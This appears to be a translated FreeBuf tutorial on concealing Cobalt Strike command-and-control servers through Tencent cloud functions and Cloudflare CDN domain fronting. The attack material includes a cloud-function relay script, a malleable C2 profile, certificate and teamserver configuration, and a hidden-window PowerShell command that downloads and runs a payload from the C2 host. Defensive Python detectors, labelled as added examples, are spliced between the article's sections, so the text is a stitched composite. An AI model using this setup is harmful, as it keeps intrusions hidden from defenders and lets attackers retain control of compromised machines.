
C2 hiding of traffic encryption

2022-06-21 13:47:00 Safety of 100 million people

Author: mac0x01

Article address: https://www.freebuf.com/articles/network/330713.html

Cobalt Strike (hereinafter CS) is a framework-style penetration testing tool that can simulate APT intranet penetration in attack-and-defense exercises. It integrates port forwarding, multi-mode port listeners, Windows exe generation, Windows dll generation, Java program generation, Office macro generation, and even site cloning to harvest browser information. As a well-known tool in the network security field, CS traffic is by now reliably identified by mature IDS and IPS detection; once the defender spots CS traffic or traces it back to the CS server's IP address, the intrusion may fail. So the traffic needs to be encrypted and hidden, so that the CS server is neither detected by the defender's security monitoring nor traced back to our CS server. The common hiding methods at present include domain fronting, CDN, cloud functions and so on; this article introduces these common ways of hiding C2.

0x01 Cloud functions

Introduction to cloud functions

Serverless Cloud Function (SCF) mainly provides a serverless execution environment for enterprises and developers: code runs without having to purchase or manage a server. Developers only need to write the core code in a language supported by the platform and set the conditions under which it runs, and the code then runs elastically and securely on the cloud infrastructure.

Cloud functions hide us well, mainly because they are deployed in many locations and each request comes from a different IP address. Although the defender can still obtain the default access domain name, in general the defense cannot get our personal information directly from Tencent Cloud through the API. So we can use this property of cloud functions to hide the CS server.

Create cloud functions

Create a custom cloud function on the cloud and set the function name; the specific settings are as follows:

The server script written into the cloud function:

# coding: utf8
import base64
import requests

def main_handler(event, context):
    # Event from the API Gateway trigger: path, headers, httpMethod and body are read from it
    response = {}
    try:
        # Modify according to your ECS address
        C2 = 'http://x.x.x.x:80'
        path = event.get('path', '/')
        headers = event.get('headers')
        if event.get('httpMethod') == 'GET':
            resp = requests.get(C2 + path, headers=headers, verify=False)
        else:
            resp = requests.post(C2 + path, data=event.get('body', ''), headers=headers, verify=False)
            print(resp.headers)
            print(resp.content)
        response = {
            "isBase64Encoded": True,
            "statusCode": resp.status_code,
            "headers": dict(resp.headers),
            # the API Gateway expects the body as a base64 string
            "body": base64.b64encode(resp.content).decode('ascii')
        }
    except Exception as e:
        print('error')
        print(e)
    finally:
        # returning from finally discards any exception; an empty response is sent on failure
        return response


Configure the trigger: choose the API Gateway trigger; the other settings are as follows:

Edit the API and change the path to /, then publish the service after the modification.

C2 Server test

On the CS server, customize a malleable C2 profile to hide the traffic. Malleable C2 works mainly by modifying the C2 configuration file, changing the properties and behaviour of the beacon payload to forge normal-looking traffic.

set sample_name "func";
set sleeptime "3000";
set jitter    "0";
set maxdns    "255";
set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";

http-get {

    set uri "/api/x";

    client {
        header "Accept" "*/*";
        metadata {
            base64;
            prepend "SESSIONID=";
            header "Cookie";
        }
    }

    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Server" "Nodejs";
        output {
            base64;
            print;
        }
    }
}
http-stager {  
    set uri_x86 "/vue.min.js";
    set uri_x64 "/bootstrap-2.min.js";
}
http-post {
    set uri "/api/y";
    client {
        header "Accept" "*/*";
        id {
            base64;
            prepend "JSESSION=";
            header "Cookie";
        }
        output {
            base64;
            print;
        }
    }

    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Connection" "keep-alive";
        output {
            base64;
            print;
        }
    }
}
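From the defender's side, the profile above leaves a recognizable shape: beacon traffic on /api/x and /api/y, a base64 blob behind the SESSIONID= or JSESSION= cookie prefix, and an application/ocsp-response body served from an API path by a server that calls itself Nodejs. The following Python is an added example, not part of the article or of Cobalt Strike, that scores HTTP transactions against those indicators; the transaction records are constructed.

```python
"""Score HTTP transactions against the indicators of the malleable profile above (added example)."""
from __future__ import annotations
import base64
import binascii

# Indicators copied from the profile: beacon and stager URIs, cookie prefixes, response headers.
BEACON_URIS = {"/api/x", "/api/y"}
STAGER_URIS = {"/vue.min.js", "/bootstrap-2.min.js"}
COOKIE_PREFIXES = ("SESSIONID=", "JSESSION=")

def _looks_base64(blob: str) -> bool:
    """True if blob is a reasonably long, strictly valid base64 string."""
    try:
        base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return False
    return len(blob) >= 16

def score_transaction(tx: dict) -> list[str]:
    """Return the indicator names matched by one transaction
    (constructed shape: {"path", "req_headers", "resp_headers"})."""
    hits = []
    path = tx["path"]
    req = {k.lower(): v for k, v in tx["req_headers"].items()}
    resp = {k.lower(): v for k, v in tx["resp_headers"].items()}
    if path in BEACON_URIS:
        hits.append("beacon-uri")
    if path in STAGER_URIS:
        hits.append("stager-uri")
    cookie = req.get("cookie", "")
    for prefix in COOKIE_PREFIXES:
        if cookie.startswith(prefix) and _looks_base64(cookie[len(prefix):]):
            hits.append("base64-cookie:" + prefix.rstrip("="))
    # Genuine OCSP responses are DER bodies from responder paths, not base64 text from /api/*.
    if resp.get("content-type") == "application/ocsp-response" and path.startswith("/api/"):
        hits.append("ocsp-ctype-on-api-path")
    if resp.get("server", "").lower() == "nodejs":
        hits.append("server-nodejs")
    return hits

def flag(transactions: list[dict], min_hits: int = 2) -> list[tuple[str, list[str]]]:
    """Paths whose transaction matched at least min_hits indicators."""
    return [(t["path"], h) for t in transactions if len(h := score_transaction(t)) >= min_hits]

# Constructed sample: one beacon check-in, one stager fetch, one benign page.
SAMPLE = [
    {"path": "/api/x", "req_headers": {"Accept": "*/*",
        "Cookie": "SESSIONID=" + base64.b64encode(b"constructed-metadata-0123").decode()},
     "resp_headers": {"Content-Type": "application/ocsp-response", "Server": "Nodejs"}},
    {"path": "/vue.min.js", "req_headers": {"Accept": "*/*"},
     "resp_headers": {"Content-Type": "application/octet-stream", "Server": "Nodejs"}},
    {"path": "/index.html", "req_headers": {"Accept": "text/html", "Cookie": "SESSIONID=abc123"},
     "resp_headers": {"Content-Type": "text/html", "Server": "nginx"}},
]
```

A single indicator such as the Server header is weak on its own, which is why the rule requires at least two to fire.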

After creating it, name it api.profile and start the server with teamserver:

./teamserver x.x.x.x xxx api.profile

C2 goes online

In the cloud function service we can find the default API access address; note that this address is the key to using the cloud function.

In the CS client, create a listener cs_hidden and set the callback address to the default API access address service-xxxx-xxx.xx.xx.tencentcs.com.

Generate the corresponding trojan and set its listener to the newly created cs_hidden.

After execution it checks in to CS successfully; if the external address keeps changing, the cloud function is being used successfully.

In the cloud function log we can see that the request has been invoked successfully.

Try submitting the trojan to the ThreatBook (Weibu) cloud sandbox for detection. We find that another host appears in our CS.

In the ThreatBook cloud sandbox we can clearly see that the requested domain name is a Tencent Cloud domain and the IP address belongs to Tencent Cloud's IDC servers, not our real CS server's IP address, which shows that the CS server has been hidden successfully.
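From the defender's side, the profile's sleeptime 3000 and jitter 0 mean this beacon checks in every three seconds, and because the cloud function answers from a different IP each time, that regularity only shows when events are keyed on the destination hostname rather than the IP. The following Python is an added example, not from the article, that computes per-host inter-arrival regularity over constructed timestamps; the source addresses, node IPs and the second hostname are assumptions.

```python
"""Flag regular check-ins to one hostname regardless of the answering IP (added example)."""
from __future__ import annotations
from collections import defaultdict
from statistics import mean, pstdev

SCF_HOST = "service-xxxx-xxx.xx.xx.tencentcs.com"   # placeholder gateway name from the article

# Constructed events: (src_ip, dst_host, dst_ip, timestamp_seconds).
# The beacon hits the gateway every 3 s (sleeptime 3000, jitter 0) while the node IP rotates.
EVENTS = [("10.0.0.5", SCF_HOST, f"203.0.113.{i % 4}", 1000.0 + 3 * i) for i in range(12)]
# A user browsing an assumed CDN host: irregular gaps.
EVENTS += [("10.0.0.7", "cdn.example.net", "198.51.100.9", t)
           for t in (1000.0, 1004.2, 1011.9, 1012.4, 1030.1, 1031.0, 1047.3, 1049.0)]

def interval_stats(events) -> dict[tuple[str, str], tuple[int, float, float]]:
    """Per (src_ip, dst_host): (hit count, mean gap, coefficient of variation of the gaps)."""
    times = defaultdict(list)
    for src, host, _ip, ts in events:
        times[(src, host)].append(ts)
    stats = {}
    for key, ts_list in times.items():
        ts_list.sort()
        gaps = [b - a for a, b in zip(ts_list, ts_list[1:])]
        if len(gaps) < 3:
            continue
        m = mean(gaps)
        cv = pstdev(gaps) / m if m > 0 else float("inf")
        stats[key] = (len(ts_list), round(m, 3), round(cv, 3))
    return stats

def beacon_candidates(events, max_cv=0.1, min_hits=6) -> list[tuple[str, str]]:
    """Pairs whose gaps are both numerous and nearly constant; jitter 0 gives cv == 0."""
    return sorted(k for k, (n, _m, cv) in interval_stats(events).items()
                  if n >= min_hits and cv <= max_cv)
```

Raising jitter in the profile spreads the gaps and raises cv, so the threshold is a tuning knob rather than a fixed rule.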

0x02 CDN and domain fronting

Introduction to domain fronting

Domain fronting is a general circumvention technique based on HTTPS, also known as domain-fronted networking. It is a way to hide the traffic of Metasploit, Cobalt Strike and similar team servers, thereby bypassing inspection or firewall detection to a certain extent. Large providers such as Amazon, Google and Akamai generally provide services on which domain fronting works.

Similar to cloud functions, domain fronting mainly forwards traffic to the real C2 server through CDN nodes. A CDN node IP forwards traffic according to the requested Host header; combined with the high reputation of the domain we configure, this effectively evades DLP, proxies and similar controls.

Introduction to CDN

The core of domain fronting is the CDN. Its working principle is that a single IP can be bound to different domain names for website acceleration. For example, suppose there are two domains, www.a.com and www.b.com, that both point to the same IP, and that IP is actually a CDN server. When we access these two domain names with a browser, how does the CDN make sure that the content returned belongs to the specified website? We add the domain name to the Host request header of the HTTP request, which lets the CDN locate the website we want to visit.

If this is unclear, a practical case demonstrates it. Assume 1.1.1.1 is the CDN server and www.a.com and www.b.com are domain names on this server, both bound to CDN acceleration.

First request www.a.com with curl; the target site's information is returned successfully:

curl www.a.com -v 


Then what happens if we request the CDN server directly? The result is 403:

curl 1.1.1.1 -v


But as soon as we add the Host header, we can access the content of www.a.com:

curl 1.1.1.1 -H "Host: www.a.com" -v

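As an added defensive example, not from the original article, the following Python classifies connection records shaped like the three curl requests above, separating a Host header that follows the URL from one injected independently of how the server was reached (or, over TLS, one that disagrees with the SNI), and lists how many distinct Host names sit behind one CDN IP. The records are constructed and the HTTPS rows are assumptions.

```python
"""Host-header consistency check for CDN-bound requests (added example)."""
from __future__ import annotations
import ipaddress
from collections import defaultdict

# Constructed connection records mirroring the curl demonstrations above:
# (dst_ip, tls_sni or None for plain HTTP, Host header, host part of the URL as typed)
RECORDS = [
    ("1.1.1.1", None, "www.a.com", "www.a.com"),          # curl www.a.com
    ("1.1.1.1", None, "1.1.1.1", "1.1.1.1"),              # curl 1.1.1.1 -> 403
    ("1.1.1.1", None, "www.a.com", "1.1.1.1"),            # curl 1.1.1.1 -H "Host: www.a.com"
    ("1.1.1.1", "www.b.com", "www.b.com", "www.b.com"),   # ordinary HTTPS to www.b.com (assumed)
    ("1.1.1.1", "www.b.com", "www.a.com", "www.b.com"),   # HTTPS where SNI and Host disagree
]

def _is_ip(name: str) -> bool:
    try:
        ipaddress.ip_address(name)
        return True
    except ValueError:
        return False

def classify(sni: str | None, host: str, url_host: str) -> str:
    """Label one request by whether its outer name (SNI or URL host) matches the Host header."""
    if sni is not None:
        # TLS: the network only sees the SNI; the CDN routes on the inner Host header.
        return "consistent" if sni.lower() == host.lower() else "sni-host-mismatch"
    if _is_ip(url_host) and not _is_ip(host):
        # Plain HTTP to a bare CDN IP with a domain in Host: the client chose the Host itself.
        return "host-injected"
    return "consistent" if url_host.lower() == host.lower() else "host-mismatch"

def hosts_behind_ip(records) -> dict[str, set[str]]:
    """Map each destination IP to the set of Host names requested through it (CDN fan-in)."""
    seen = defaultdict(set)
    for dst_ip, _sni, host, _url in records:
        if not _is_ip(host):
            seen[dst_ip].add(host.lower())
    return dict(seen)

def review(records) -> list[tuple[str, str]]:
    """Return (Host, label) for every record that is not consistent."""
    return [(h, lab) for _d, s, h, u in records if (lab := classify(s, h, u)) != "consistent"]
```

The two flagged rows are exactly the request shapes that a Host-only routing decision lets through, which is the mechanism the curl demonstration relies on.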

Environment setup

We can set up the environment as follows; the whole set costs about 6 dollars.

  • Cloud server
  • Cobalt Strike 4.3
  • Cloudflare CDN acceleration
  • domain name

Domain name purchase address: https://porkbun.com

ECS purchase address: https://my.vultr.com

CDN registration address: https://www.cloudflare.com

Buying a server

Register an account on Vultr. After registration I chose PayPal binding; it took about a day to verify my account. Without PayPal you can of course also bind Alipay or a credit card.

After binding, the new account is credited with 150 dollars. Choose a configuration you like and deploy an ECS; the IP address after deployment is 2.2.2.2.

Purchase domain name

Register an account on porkbun and purchase the new domain xxx.xyz.

Configuring the CDN

Bind the domain purchased above in Cloudflare. The result shows that we need to modify the domain's DNS records.

Change the domain's nameservers to the following:

jake.ns.cloudflare.com
magdalena.ns.cloudflare.com


After the change, wait for Cloudflare to re-check until the following interface appears, which indicates the CDN deployment succeeded.

Add the DNS records as follows. At the same time, we also

A c2 2.2.2.2
A xxx.xyz 2.2.2.2


Test whether the CDN node resolves the domain; successful resolution means everything is going well so far:

curl 172.67.175.223 -H "Host: xxx.xyz" -v


Enable SSL in Cloudflare and set the SSL/TLS encryption mode to Full.

Create an SSL/TLS certificate with the following configuration:

Click Create to generate the corresponding origin certificate and private key.

C2 Server test

Customize the malleable C2 on the ECS to use the certificate: use openssl to generate the PFX file spoofdomain.p12 from the CDN's SSL/TLS origin certificate and private key.

openssl pkcs12 -export -in cloudflare.pem -inkey cloudflare.key -out spoofdomain.p12 -name c2.maccc.xyz -passout pass:macmacmac

Keytool is Java's certificate management tool; use it to import the key and certificate in the PFX file above into the keystore file new.store:

keytool -importkeystore -deststorepass macmacmac -destkeypass macmacmac -destkeystore new.store -srckeystore spoofdomain.p12 -srcstoretype PKCS12 -srcstorepass macmacmac -alias c2.xxx.xyz


Tool download address: https://github.com/FortyNorthSecurity/C2concealer

C2concealer is a command-line tool that randomly generates malleable C2 profiles for CS. If it is not installed, install it with the following commands:

chmod u+x install.sh
./install.sh


Use C2concealer to generate the CS configuration file:

C2concealer --variant 1 --hostname c2.xxx.xyz
# Choices entered at the interactive prompts:
# 1. 3
# 2. /root/CS4.3/new.store
# 3. enter the account and password


A CS configuration file named with a random number is generated; copy it to the CS directory and rename it test.profile:

cp 56069b6a.profile /root/CS4.3/test.profile
cd /root/CS4.3/
ls


Use c2lint to check the configuration file:

chmod +x c2lint
./c2lint test.profile


Modify the teamserver configuration; while there, CS's default port 50050 can also be changed to another port.

vim teamserver
# Configuration changes (keystore and its password):
-Djavax.net.ssl.keyStore=./new.store
-Djavax.net.ssl.keyStorePassword=macmacmac


Start teamserver and load the configuration file test.profile:

./teamserver 2.2.2.2 macmacmac test.profile

C2 goes online

In the CS client, generate an HTTPS listener.

Configure a web service with SSL and choose powershell as the payload type.

The powershell version of the payload is generated successfully:

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('https://c2.xxx.xyz:443/test'))"

After it is executed on the target machine, the beacon checks in successfully. At the same time we can see that the external address changes with each request, so the probability of defenders tracing back to our C2 server's IP address is very low.

Execute a command in CS successfully and start Wireshark on the victim host to capture packets.

In Wireshark, all traffic is TLS-encrypted and the destination addresses are random CDN nodes, so it cannot be traced back to the real IP of our C2 server.

0x03 Summary

Over this period of studying traffic encryption I have found that cyber attack and defense are always changing. For example, CDN was originally designed mainly to protect a website's real IP, but as attackers we can also use it to protect our C2 server; and the RSA certificate generated with OpenSSL, besides authentication, also helps attackers encrypt traffic and hide communication.

Reference article 1: https://blog.csdn.net/weixin_44604541/article/details/118413649

Reference article 2: https://www.anquanke.com/post/id/243146
